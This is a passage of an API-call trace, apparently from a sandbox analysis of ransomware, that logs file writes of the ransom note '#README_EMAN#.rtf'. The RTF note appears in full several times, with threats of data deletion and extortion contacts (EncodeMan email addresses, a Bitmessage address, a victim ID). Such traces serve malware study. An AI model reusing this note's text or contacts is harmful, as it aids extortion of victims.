nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eeaaa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n)K\x8d\x97\x8f\x01ú\x9fÜ\x02-\x84\x06\x985JS\x14A\x91", lpUsedDefaultChar=0x0) returned 8717 [0288.138] WriteFile (in: hFile=0x2f0, lpBuffer=0x1eeaaa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eeaaa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.140] CloseHandle (hObject=0x2f0) returned 1 [0288.141] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0288.141] GetLastError () returned 0x2 [0288.141] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0288.142] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 